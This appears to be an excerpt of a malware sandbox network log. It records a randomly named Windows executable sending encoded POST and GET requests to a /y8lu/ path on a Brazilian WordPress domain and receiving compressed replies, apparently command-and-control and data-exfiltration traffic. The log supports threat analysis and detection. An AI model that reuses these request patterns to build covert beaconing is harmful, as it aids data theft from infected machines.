May 27, 2024 12:21:02.040977001 CEST	1236	IN	Data Raw: 33 f6 44 9c 55 fa 53 48 a7 72 da 14 3c 85 36 78 2e da a0 06 8d 85 21 c8 53 67 ac 92 0f a3 9c 3a df 2a fd 30 d2 a9 b3 ad d2 0f 23 0d 9f 87 34 3c 8c 34 7a 1e d2 a8 ce 99 82 85 77 68 b9 f0 2e d1 aa 90 d1 12 71 37 f0 94 5d 1d 42 9d 2b e6 4c e2 65 c1 Data Ascii: 3DUSHr<6x.!Sg:*0#4<4zwh.q7]B+LeMJd,>IP34tZt):Qj:"RVJ3\|Z;,K<I-@.)=wreHPg{f;Xkj\|8ddI+?1
May 27, 2024 12:21:02.040987968 CEST	1236	IN	Data Raw: 51 ff 24 43 1d 49 0d 98 81 d6 78 69 e8 d3 61 6b e6 3a 69 8a 68 f1 69 ad 2c 24 4a 73 30 8b fa a8 e0 66 e9 3e 6a e7 39 f8 d5 2a eb 52 89 e0 8b 8c e9 84 4b 1a 28 f4 43 e6 3b 2b a3 85 b7 d3 73 65 1c f7 cc d9 c6 d0 18 ed bc 78 f2 96 b8 61 99 06 d6 26 Data Ascii: Q$CIxiak:ihi,$Js0f>j9*RK(C;+sexa&Oqvf/PH-=0Yqu...!#_4j~/'=C7ahe{\`^IZn,L.b,ncew1@[We}o(V(,=Vvi_
May 27, 2024 12:21:02.040998936 CEST	1236	IN	Data Raw: 00 69 27 8d 7f 45 2f fd a4 c1 18 72 d1 19 75 06 55 0d 1a 86 e7 96 f0 68 d2 40 e2 42 b1 88 e6 4a cc 63 2e 04 ad 7c 90 b1 bc 71 7b d6 24 7f fc f9 cf 7f 7a 57 66 7f 27 20 43 c4 8e 29 72 97 60 c8 97 5f 3e 71 db 6c 6c 70 5a a4 45 fe f6 37 12 a1 25 cb Data Ascii: i'E/ruUh@BJc.\|q{$zWf' C)r`_>qllpZE7%\|E\t?.zv #U^d\v>MAOzNq+9cs!wZkQ-hCz%iglQlB~5_u{_q_vgprB@t;lS)
May 27, 2024 12:21:02.045931101 CEST	1236	IN	Data Raw: 70 c9 6d e9 cf 97 6e ff 51 4d b9 23 55 d8 ba a2 ef 97 77 55 95 65 01 97 11 e0 3a 50 8b d2 45 65 f8 79 22 0b 85 36 20 8f a0 96 30 cf c2 89 38 13 2a d9 d9 88 c3 a4 b4 f4 61 b9 91 95 b2 2e f2 67 17 68 1c 4a 17 2c 80 47 e9 7f 72 81 ba 74 ad 9c 2f aa Data Ascii: pmnQM#UwUe:PEey"6 08a.ghJ,Grt/D`[r!Fix)W/<,L+$&>[~;:AG<20x#!5G>SIjrGsr+'PMI4i7 ^J\tz3==r=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.12	49729	50.116.86.54	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:04.359190941 CEST	726	OUT	POST /y8lu/ HTTP/1.1 Host: www.celluslim.com.br Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.celluslim.com.br Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.celluslim.com.br/y8lu/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 72 55 4e 70 73 57 66 67 79 59 78 77 73 78 62 38 54 6b 78 4a 56 30 47 55 58 62 7a 43 62 6b 5a 71 66 7a 4b 5a 6f 46 4d 59 61 37 6e 52 49 6a 76 39 64 6c 7a 41 6a 2b 6c 75 6e 70 77 79 6d 73 6c 58 77 78 45 71 52 4d 6a 78 69 4e 67 33 70 46 54 46 43 47 6e 4c 79 5a 35 58 4b 64 2f 6e 30 4b 6b 54 39 56 51 52 68 79 57 73 73 2b 36 31 4e 46 59 45 57 69 4b 7a 74 67 6e 5a 55 7a 53 77 35 48 6c 45 62 46 57 68 39 4d 6e 78 4b 4d 45 43 51 71 68 64 6c 76 6f 6d 6b 72 33 58 63 48 50 49 56 4d 54 67 79 73 53 69 62 48 6e 5a 75 78 49 44 2f 75 49 39 4f 57 4a 78 43 61 56 62 43 53 48 56 58 55 37 68 73 30 48 70 4a 75 35 65 49 73 65 4e 67 6e 76 63 44 4b 76 65 32 41 73 3d Data Ascii: VlEHDVvh=rUNpsWfgyYxwsxb8TkxJV0GUXbzCbkZqfzKZoFMYa7nRIjv9dlzAj+lunpwymslXwxEqRMjxiNg3pFTFCGnLyZ5XKd/n0KkT9VQRhyWss+61NFYEWiKztgnZUzSw5HlEbFWh9MnxKMECQqhdlvomkr3XcHPIVMTgysSibHnZuxID/uI9OWJxCaVbCSHVXU7hs0HpJu5eIseNgnvcDKve2As=
May 27, 2024 12:21:04.961607933 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:04 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://celluslim.com.br/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 14746 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 e3 46 92 2d fa bb f4 14 69 7a d9 22 6d 26 09 7e e9 03 14 d5 ed 2e db d3 3e a7 7b ec d5 e5 9e b9 e7 da 5e b5 12 40 00 c8 52 22 13 93 99 20 c5 62 eb 61 66 9d b7 b8 7f fb c5 6e 24 c0 2f 91 a0 48 a9 34 d3 33 a3 0f 00 19 19 b1 63 c7 8e 7d f3 d9 b7 3f be fd f9 ff fc f4 1d 49 6d 26 6e cf 6e dc 8b 08 26 93 49 23 b7 f4 a7 9f 1b 2e 06 2c ba 3d 7b 73 93 81 65 24 4c 99 36 60 27 8d bf fe fc 3d bd 6a 90 ee fa 46 b2 0c 26 8d 29 87 59 ae b4 6d 90 50 49 0b 12 33 67 3c b2 e9 24 82 29 0f 81 96 87 36 e1 92 5b ce 04 35 21 13 30 e9 95 38 5b 30 e7 5a 05 ca 9a f3 35 c8 79 c6 ee 29 cf 58 02 34 d7 e0 9a f8 82 e9 04 ce cb 42 cb ad 80 db 9f fe fe ef 09 97 88 f0 f7 ff ab 08 48 57 aa 59 c4 c8 97 9f 5f f5 7b bd 31 79 0b 42 14 e4 9d e0 d9 4d b7 aa 38 bb 11 5c de 11 0d 62 72 1e 49 e3 a0 63 b0 61 7a 4e 52 fc 9a 9c 77 bb a1 ab 31 58 d2 09 55 d6 09 74 d5 6f 5d d5 60 c2 82 96 cc 42 83 d8 79 8e f3 b3 3c 17 3c 64 96 2b d9 d5 c6 7c 7d 9f 09 bc 72 dd 26 8d 0d 01 f2 a5 66 ff 56 a8 31 f9 1e 20 6a 54 [TRUNCATED] Data Ascii: vF-iz"m&~.>{^@R" bafn$/H43c}?Im&nn&I#.,={se$L6`'=jF&)YmPI3g<$)6[5!08[0Z5y)X4BHWY_{1yBM8\brIcazNRw1XUto]`By<<d+\|}r&fV1 jT{vcL6:PkQ&rf5H:g9dr2!FUktf_ZnYk7xen{\&x0exXXY:hoPl_jkwS.CQDS2q`~7=:gs& Ac\|=,.dmZL&m0^Iyyg'Sg0</~S\|~cU?M_~7yZ(Fvy{8jqTmk{m<39etsL'ma?.+vFk6oB'ANn0'p%ki5BKb;&7{EZ%L&Xlf!:4eiZDWq<-]VQZwF1
May 27, 2024 12:21:04.961697102 CEST	224	IN	Data Raw: 1e 34 76 af 2a 90 ad 84 d6 97 5f 7e b6 cb 6c 88 cf 60 e8 e1 33 bc b8 dc fa ee 6f 7d 8f b6 be a1 3e ff 72 67 92 e1 ba fd 56 f2 4e a4 bf 17 19 ed 45 e0 38 0e b6 6e 8d cb 15 40 a6 3e f0 d5 0e b6 26 8d 5c 5a ff 62 ad 7e d0 0b 1a 35 57 c1 f2 aa f5 b0 Data Ascii: 4v_~l`3o}>rgVNE8n@>&\Zb~5WDm>eI\Blb9wIw/pi,amcj4jsykaf;HlTNnli/Qq!,^/gC&Mqy@4m
May 27, 2024 12:21:04.961708069 CEST	1236	IN	Data Raw: 7e d2 b8 f0 3c 32 e8 e7 f7 e4 1b cd 99 40 a0 87 d6 78 e9 63 c0 14 fd 1d 43 9b af 94 68 42 6b a1 7e 81 df 26 b6 c9 da 80 8a b8 06 1b 9d ac bb 77 1a d9 c9 1e 7b 1c 92 e7 16 97 65 3b 46 87 13 14 b4 83 22 82 9e 7c e6 b5 79 27 45 e6 1d 96 e7 20 a3 b7 Data Ascii: ~<2@xcChBk~&w{e;F"\|y'E )QdI&Y;+\ikm3+W,`znSAw!{,taHaQ7$f\.cEY(\|Vz:ZX=/0_~N4V0YYn?X
May 27, 2024 12:21:04.961724997 CEST	1236	IN	Data Raw: ed 7d 1c cd 93 f4 79 40 5a 38 a0 fe 2b 11 da c3 79 29 a1 c1 2b 11 da c3 79 29 a1 e1 2b 11 da c3 79 29 a1 d1 2b 11 da c3 79 29 a1 8b 57 22 b4 87 f3 32 42 0b ad 2c b3 e0 f7 ae bc 08 92 87 b3 b3 37 f8 d3 e1 86 96 c9 94 19 0b 9a 9b 3b 3f 80 58 69 20 Data Ascii: }y@Z8+y)+y)+y)+y)W"2B,7;?Xi Mi}r~>"3'HC(d,K*d)MJg9PKZiMBk 9?zAj8xk1\\|"~=q^rpKG'uazK`Jz(\
May 27, 2024 12:21:04.961741924 CEST	1236	IN	Data Raw: 60 11 2f 9c e0 2b 22 1e f9 cf a0 e2 c7 2a 2c cc 42 15 56 70 09 25 a3 d7 eb 79 04 a8 b5 d8 12 9d 5c e1 b4 bb 99 1d 26 78 22 43 90 16 f4 d1 7e 8b a5 3d 59 61 d5 06 e9 97 88 59 46 4b 9c 49 e9 bf df f6 80 0e 0e aa a4 98 1f 6f 1b 0b c5 ac 5f 62 3f 9c Data Ascii: `/+"*,BVp%y\&x"C~=YaYFKIo_b?t=)G5dS0C!44SF[,PSH`VQ.WnTNR,<"]{j5v^"<K`rT@l]V3ib3pAr+
May 27, 2024 12:21:04.961751938 CEST	1236	IN	Data Raw: 85 1f 0c a1 0f 08 3f bc ec f7 e2 80 8c bc 2f da 9f b3 a0 17 c5 f0 a8 55 ca 3e 3a 39 66 f2 a5 7d 62 c6 42 76 d5 fe 3c 62 91 07 e1 23 6c 53 04 51 01 11 55 82 4f 5f 2c 53 cc 62 06 bd f6 e7 17 97 ec e2 b2 f7 08 9f 59 95 f1 10 65 02 96 bd 18 3e 8a 2e Data Ascii: ?/U>:9f}bBv<b#lSQUO_,SbYe>.Kg((g<+=}op.1^jHB<?b 0!~?ZI3&jL7)X%Hj`R&x"i^l"~K4wKN29uD,@!Vij
May 27, 2024 12:21:04.961765051 CEST	1236	IN	Data Raw: fb 50 29 e1 7a ce 98 ce a8 c9 21 b4 ba c8 9e 6c 78 39 c4 5e 43 b7 f8 2d cf f5 da bd be 5b fd 75 8b f4 b7 15 70 8b 41 09 86 ab 18 12 1d 0e 2b 7b 5c ac 62 ae 18 d5 bb 46 fe 57 eb 18 36 18 5e b5 2f 8f ca 87 32 a1 4a 95 7e 79 a1 73 f1 a4 57 ca 55 f5 Data Ascii: P)z!lx9^C-[upA+{\bFW6^/2J~ysWUb=!QV#`N8mLZdj*yswvx}B::g}eM>m5vDcuC2^tL(tzGU_^
May 27, 2024 12:21:04.961776972 CEST	1236	IN	Data Raw: 74 95 92 b0 7c 33 d2 aa 61 99 de e1 86 0a 36 57 85 a5 b8 a7 59 8b 3c 31 c3 a2 7e 82 e3 78 b5 63 2c ea 86 38 8a f5 55 2d 89 e5 68 cf 41 44 2f 19 ab 19 97 10 bd e6 d0 7b b0 9f 3e fb 2e e4 ab 49 10 0b b8 6f 91 c5 b6 39 0e a5 26 9a 47 bb a9 75 3b 42 Data Ascii: t\|3a6WY<1~xc,8U-hAD/{>.Io9&Gu;Bz&x"v8\<Idw>iATv}g<Lov&Q]W`KWRFr3'SrCP0A]/P?Bkvd'rKN5~EMg
May 27, 2024 12:21:04.961787939 CEST	1236	IN	Data Raw: 19 fb 49 e8 2b 90 a7 f0 3f 8d ff 06 e6 a9 1e 83 d7 e9 31 a8 e9 c1 c2 10 e4 a7 a9 54 41 1c c6 fe 34 85 56 20 87 f1 3f 4d 9d 15 c8 61 fc e1 6b e0 0f 0f e3 8f 5e 03 7f 54 83 1f 08 84 a1 81 d2 11 e8 15 f0 d6 e1 09 d0 b2 b2 ce 91 73 26 f1 b2 e0 26 a5 Data Ascii: I+?1TA4V ?Mak^Ts&&f9/c]]<SQ5TL&/SxGK~<I-@.m^; w}vAl1Y>.ys)-*Cx#~f}MSO`0
May 27, 2024 12:21:04.961800098 CEST	1000	IN	Data Raw: 9f 00 09 84 28 2c a5 3d af 85 82 56 76 69 ed f5 5f b5 f3 85 1b 33 4c b9 88 76 1a bb 1e de 5e 5d 27 65 86 3a 03 51 1c 2b 91 54 f3 24 b5 1d 6e 96 7e ce 05 e3 12 7d a5 ad 20 3b d1 1d 20 74 bd 6d ee a2 85 e8 3e d0 ad da 3b 01 b1 6d ad cc 34 e3 91 4d Data Ascii: (,=Vvi_3Lv^]'e:Q+T$n~} ; tm>;m4M}9[:M4rgS'PejNByX t2t."d7=yaWhUL3.XIVN,R,c[99.h-B>1z8g7hr+^E+mRp44}LO
May 27, 2024 12:21:04.967379093 CEST	1236	IN	Data Raw: 2c 43 88 04 24 a0 24 4a 37 48 88 8b 00 69 27 8d 7f 45 2f fd a4 c1 18 72 d1 19 75 06 55 0d 1a 86 e7 96 f0 68 d2 40 e2 42 b1 88 e6 4a cc 63 2e 04 ad 7c 90 b1 bc 71 7b d6 24 7f fc f9 cf 7f 7a 57 66 7f 27 20 43 c4 8e 29 72 97 60 c8 97 5f 3e 71 db 6c Data Ascii: ,C$$J7Hi'E/ruUh@BJc.\|q{$zWf' C)r`_>qllpZE7%\|E\t?.zv #U^d\v>MAOzNq+9cs!wZkQ-hCz%iglQlB~5_u{_q_vgprB@t;l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.12	49730	50.116.86.54	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:07.027299881 CEST	1739	OUT	POST /y8lu/ HTTP/1.1 Host: www.celluslim.com.br Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.celluslim.com.br Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.celluslim.com.br/y8lu/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 72 55 4e 70 73 57 66 67 79 59 78 77 73 78 62 38 54 6b 78 4a 56 30 47 55 58 62 7a 43 62 6b 5a 71 66 7a 4b 5a 6f 46 4d 59 61 37 66 52 4c 56 54 39 66 43 76 41 69 2b 6c 75 37 5a 77 7a 6d 73 6b 46 77 78 63 75 52 4d 2f 4c 69 49 38 33 6f 6a 50 46 54 43 4c 4c 6e 70 35 58 47 39 2b 67 37 71 6b 38 39 55 39 61 68 32 36 73 73 2b 36 31 4e 47 41 45 51 7a 4b 7a 76 67 6d 72 44 44 53 38 7a 6e 6b 4b 62 45 7a 57 39 4d 6a 48 4c 39 6b 43 54 4b 78 64 69 64 77 6d 76 72 33 56 66 48 50 51 56 4d 50 6a 79 73 4f 41 62 48 43 79 75 79 6f 44 2f 4a 6c 6a 55 31 42 59 57 6f 78 55 46 42 4c 67 61 55 62 53 72 56 76 39 43 6f 52 46 46 4a 2f 63 72 78 36 4b 62 6f 6a 76 69 57 6a 4d 71 70 79 6c 37 67 48 31 54 4d 6f 2b 59 52 5a 62 39 32 71 33 76 32 54 37 31 2b 36 66 32 51 61 48 78 74 6f 33 70 75 39 5a 6b 47 34 31 56 2b 45 49 58 6c 47 34 2b 46 35 36 5a 42 6d 6e 58 79 6e 39 43 59 64 46 75 46 36 38 45 42 7a 54 4c 71 4e 4d 41 56 4e 39 31 4c 79 72 55 4c 30 39 4a 34 78 64 50 7a 59 39 66 44 50 49 4b 48 50 44 50 68 65 58 4a [TRUNCATED] Data Ascii: VlEHDVvh=rUNpsWfgyYxwsxb8TkxJV0GUXbzCbkZqfzKZoFMYa7fRLVT9fCvAi+lu7ZwzmskFwxcuRM/LiI83ojPFTCLLnp5XG9+g7qk89U9ah26ss+61NGAEQzKzvgmrDDS8znkKbEzW9MjHL9kCTKxdidwmvr3VfHPQVMPjysOAbHCyuyoD/JljU1BYWoxUFBLgaUbSrVv9CoRFFJ/crx6KbojviWjMqpyl7gH1TMo+YRZb92q3v2T71+6f2QaHxto3pu9ZkG41V+EIXlG4+F56ZBmnXyn9CYdFuF68EBzTLqNMAVN91LyrUL09J4xdPzY9fDPIKHPDPheXJfqGd+MBhINUmKDauKghO0c68ciW9WZib/lAufY1nJ76lOB4RrBRIpxYHB41yv/0hOzhkkKr/xaxJutjiZExlxLRv7vy5N1oePmJUllQahPw2OWiZhbEO7SgZFunV/rWNXGL+7qTZNYFasOUxEM8LaI7WiQSUsxlCXSSBkCn88G94yUThOWTsURcBOfWRcm7ecRhEYGlPMe7yhal/Eusx4LF0D9Ra/d6ZLAqOUuntG3MriLanVMI1g6VCKfpEyckd4R7ZqVtMg9iR57Te+PQc/vV+tO+pq/DQMQuriGP2jcDSpxxv/vYt7+LZaYT0PjNGHiOMJECCx8Q3h0mGltr0Afu2wYDvNEAl0TMqxIDyPr2yELjDv7p7xoUqDe7ij9pVDy4tGfwneiTWV4up0bP7t4m42UJVqyyeaXqXQhbihRMlFkpUrFQ/Kln1xKfPVEIeUJIHTDRy7BWK2/UguB/0J+tR/KAH6GFpmI5/Q7kS69Ib4TCDOaFzVi4suEypmIKOLVZX83/hC7UJ1gMVu3E8z05ypk/VH20OKReIRLx4LHGlFLxITnRb9w9Sa022ravAP7xuDyWQK6nbl877xvkKGrJ4lFksiq08gpYMmeIbWy9iOpL1Sj4LILKS7k7cWtQXQXoe20Gc8VUpUjZIeOJwrMoZ/QwIyh1KKV [TRUNCATED]
May 27, 2024 12:21:07.627377987 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:07 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://celluslim.com.br/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 14746 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 e3 46 92 2d fa bb f4 14 69 7a d9 22 6d 26 09 7e e9 03 14 d5 ed 2e db d3 3e a7 7b ec d5 e5 9e b9 e7 da 5e b5 12 40 00 c8 52 22 13 93 99 20 c5 62 eb 61 66 9d b7 b8 7f fb c5 6e 24 c0 2f 91 a0 48 a9 34 d3 33 a3 0f 00 19 19 b1 63 c7 8e 7d f3 d9 b7 3f be fd f9 ff fc f4 1d 49 6d 26 6e cf 6e dc 8b 08 26 93 49 23 b7 f4 a7 9f 1b 2e 06 2c ba 3d 7b 73 93 81 65 24 4c 99 36 60 27 8d bf fe fc 3d bd 6a 90 ee fa 46 b2 0c 26 8d 29 87 59 ae b4 6d 90 50 49 0b 12 33 67 3c b2 e9 24 82 29 0f 81 96 87 36 e1 92 5b ce 04 35 21 13 30 e9 95 38 5b 30 e7 5a 05 ca 9a f3 35 c8 79 c6 ee 29 cf 58 02 34 d7 e0 9a f8 82 e9 04 ce cb 42 cb ad 80 db 9f fe fe ef 09 97 88 f0 f7 ff ab 08 48 57 aa 59 c4 c8 97 9f 5f f5 7b bd 31 79 0b 42 14 e4 9d e0 d9 4d b7 aa 38 bb 11 5c de 11 0d 62 72 1e 49 e3 a0 63 b0 61 7a 4e 52 fc 9a 9c 77 bb a1 ab 31 58 d2 09 55 d6 09 74 d5 6f 5d d5 60 c2 82 96 cc 42 83 d8 79 8e f3 b3 3c 17 3c 64 96 2b d9 d5 c6 7c 7d 9f 09 bc 72 dd 26 8d 0d 01 f2 a5 66 ff 56 a8 31 f9 1e 20 6a 54 [TRUNCATED] Data Ascii: vF-iz"m&~.>{^@R" bafn$/H43c}?Im&nn&I#.,={se$L6`'=jF&)YmPI3g<$)6[5!08[0Z5y)X4BHWY_{1yBM8\brIcazNRw1XUto]`By<<d+\|}r&fV1 jT{vcL6:PkQ&rf5H:g9dr2!FUktf_ZnYk7xen{\&x0exXXY:hoPl_jkwS.CQDS2q`~7=:gs& Ac\|=,.dmZL&m0^Iyyg'Sg0</~S\|~cU?M_~7yZ(Fvy{8jqTmk{m<39etsL'ma?.+vFk6oB'ANn0'p%ki5BKb;&7{EZ%L&Xlf!:4eiZDWq<-]VQZwF1
May 27, 2024 12:21:07.627456903 CEST	1236	IN	Data Raw: 1e 34 76 af 2a 90 ad 84 d6 97 5f 7e b6 cb 6c 88 cf 60 e8 e1 33 bc b8 dc fa ee 6f 7d 8f b6 be a1 3e ff 72 67 92 e1 ba fd 56 f2 4e a4 bf 17 19 ed 45 e0 38 0e b6 6e 8d cb 15 40 a6 3e f0 d5 0e b6 26 8d 5c 5a ff 62 ad 7e d0 0b 1a 35 57 c1 f2 aa f5 b0 Data Ascii: 4v_~l`3o}>rgVNE8n@>&\Zb~5WDm>eI\Blb9wIw/pi,amcj4jsykaf;HlTNnli/Qq!,^/gC&Mqy@4m~<2@x
May 27, 2024 12:21:07.627469063 CEST	1236	IN	Data Raw: 76 0f 1a 71 0d a1 83 3a 88 bd ce d8 e0 97 95 33 cd f2 83 45 ee b2 ed 1e ad f1 87 c2 58 1e cf 91 09 1a 43 da 83 25 cb bc 75 97 87 23 0a 6d 21 38 71 16 87 86 de 5e 0f ea 7f 47 34 88 c9 79 19 31 29 80 3d 7f bc ae 2d 58 b7 28 92 6a 88 27 e7 a9 b5 b9 Data Ascii: vq:3EXC%u#m!8q^G4y1)=-X(j' Da::aBQD`enBnzru$9tmgM:)3t3j;E{^d,r9~AF%,/mGr&3T3\4Ww8!TZ}y@Z8+y)
May 27, 2024 12:21:07.627480984 CEST	1236	IN	Data Raw: 4b aa 26 d5 5c de 6d e8 ad c9 3e 29 ea cb 3a fe c2 34 67 14 ee 73 26 23 88 26 56 17 f0 db 62 d3 09 fd 16 36 5d 3b 42 d1 22 e8 91 d6 27 f7 dd b1 d4 46 73 6f 23 e7 d8 e2 5e 0d 77 4a d3 5c 2b cc b3 73 bf cc 7a 85 f6 ce 56 a5 ce 01 33 dc 94 62 6e f7 Data Ascii: K&\m>):4gs&#&Vb6];B"'Fso#^wJ\+szV3bn;n; "(~u)X_Pe@YV$WCxKQEIlfyPJ%xD>_K!0Wpd=T`/+"*,BV
May 27, 2024 12:21:07.627492905 CEST	896	IN	Data Raw: 97 cc f3 a2 f8 d0 7d d5 a7 d7 ef b7 bd 76 bf 3f 58 a6 b9 7d 2e 93 97 28 d7 97 c3 cb 38 7e f8 7d 06 11 67 a4 e9 88 68 30 4a 14 96 2b e9 f7 ae fb 51 ce 5b 8b bd 15 d5 90 ed 75 46 f9 fd c3 43 07 73 40 e0 e4 d2 d2 a0 b0 56 c9 45 58 68 83 bd 72 c5 a5 Data Ascii: }v?X}.(8~}gh0J+Q[uFCs@VEXhrFsl"(JgLuIi?D}4Ih9Z,I-M4isCp:`sOO(OysSXyD'k[}%0j#Hzv@/?/
May 27, 2024 12:21:07.627504110 CEST	1236	IN	Data Raw: 7d 05 e9 fc fa c5 c3 b2 30 e6 49 a1 a1 b5 c8 98 4e b8 f4 3d e2 91 1e 64 8f bd cc 0d cd 95 e1 96 2b 89 04 78 78 37 6f 2d 28 c5 3e 2c ca b8 a4 cb 57 c0 34 dd e4 a9 38 36 60 fd 29 d3 cd 03 a9 15 b7 b6 97 df b7 1e 7e 9f 41 c4 19 31 a1 06 90 84 c9 88 Data Ascii: }0IN=d+xx7o-(>,W486`)~A147t/<x-Jpv-=)GDJcC\9=T4\w>+9!QpD9 [sZW)},Ppq}h]I.q;Gp*~
May 27, 2024 12:21:07.627515078 CEST	1236	IN	Data Raw: 38 f5 bb 72 fe bf fe b0 77 7e 37 cf 02 25 76 e6 30 39 0b 71 45 94 f6 3c 9f f4 d0 05 87 ee fb 78 9f 71 89 ae 5d fa 6a 3a db 35 cc 3a 77 b0 cc 5d 79 70 f0 44 ee 70 99 3b 2c 33 47 4f 64 8e 96 99 17 4b d4 ab 27 72 2f 56 6c bd 65 72 af 8e 43 ca 22 35 Data Ascii: 8rw~7%v09qE<xq]j:5:w]ypDp;,3GOdK'r/VlerC"5T2[h&\|r56Yu#cMy5Cs]K?^N\|wCyV>*N2v.DR}OYK#3vYM[L7aip
May 27, 2024 12:21:07.627526999 CEST	1236	IN	Data Raw: aa 1c 19 77 2e dc dc ab 98 5e 3a 73 3b 16 28 d4 3a db 4b 15 10 af 32 2d dc 5b 1a 41 a8 34 b3 5c 49 c7 47 42 dd 0a fd 54 4d 41 1f 5a 64 75 fb 92 75 d2 7e eb b9 ab 73 25 a7 2d ab 6e 8e 58 85 85 39 38 47 79 fb 5f 6e 0e 55 d8 d2 0f a7 9b 7b 55 a1 e2 Data Ascii: w.^:s;(:K2-[A4\IGBTMAZduu~s%-nX98Gy_nU{U\|k`S8(Gu=^tXqEbA@t.aBKe8t7lY<g1~e\*Qx+2dp!UgILeMJ' RnD2#gh<g_56!:
May 27, 2024 12:21:07.627537012 CEST	1236	IN	Data Raw: b1 87 f4 44 b7 57 69 b4 df e3 ac 83 45 81 50 e1 1d 95 6c ca 13 66 b9 92 15 f6 0c 78 92 5a 9f 8c 3c ef 40 1e 61 fe 2c 05 0d 4d 5f 2a db 74 19 20 20 03 ac 0d 0a 6b 95 6c b5 16 a1 12 4a fb 84 4b cc e3 76 6c e1 de d2 08 42 a5 4b 00 9f 48 25 e1 c5 e8 Data Ascii: DWiEPlfxZ<@a,M_t klJKvlBKH%~{@l0%@.j2{RfEppE1!Z>J[JT`!{[%N%f~k)=,?Msu9dE&fo:#C}W5[m"K;
May 27, 2024 12:21:07.627551079 CEST	1236	IN	Data Raw: f1 c6 ee 14 0a 9e fb c4 6d bd d9 cb ef db 5b ff ad f5 3d cd 99 4d 7d c2 25 b2 6e 8e bc 2f aa 9b 14 78 92 5a 9f 60 6a 79 ce 98 4e b8 f4 09 5d 05 d4 14 74 2c d4 cc 27 29 8f 22 5c a7 0b e6 2c 8a d0 ec ab f6 b9 32 bc f4 1b 61 81 c1 e5 58 20 9f f1 2c Data Ascii: m[=M}%n/xZ`jyN]t,')"\,2aX ,W2i\W"Rw2`KVXhK2{Y=sjrse(5S?#]2 h9kUN5c{I\|7!]7KU?"GHTJnDI#67~ru
May 27, 2024 12:21:07.641701937 CEST	1236	IN	Data Raw: 6f 27 e7 8b 86 9a 82 46 ec 1f 73 90 10 fd 61 de f0 17 8d 50 f0 f0 ae e1 c7 4c 18 68 a3 01 30 63 7d 8a 55 58 98 e5 e9 a1 dd b0 f3 1c 1a fe 0a a4 d1 6e 68 25 e0 1b 6b 35 0f 0a eb 6e 30 e4 c8 fe c9 71 c5 e3 9f 41 16 8d 87 f3 db 1b bc b6 a8 68 39 48 Data Ascii: o'FsaPLh0c}UXnh%k5n0qAh9HpyOgB%&\i3np,Rjx#NN(4GG}/MEd$1xdI?lLH$Zl6n.6~GCx)+.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.12	49731	50.116.86.54	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:09.561501026 CEST	428	OUT	GET /y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA+vQb38eHFgRBz6unIHe4HBIxzvdSvdhO03jK4wsowAz3gHYbTW35gnt1fPF07v4JZ2cMipkMMw/S8lqxq9gNP1PGwmWBqthC4=&BHPD=o2nt HTTP/1.1 Host: www.celluslim.com.br Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:21:10.125196934 CEST	491	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 27 May 2024 10:21:10 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://celluslim.com.br/y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA+vQb38eHFgRBz6unIHe4HBIxzvdSvdhO03jK4wsowAz3gHYbTW35gnt1fPF07v4JZ2cMipkMMw/S8lqxq9gNP1PGwmWBqthC4=&BHPD=o2nt Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
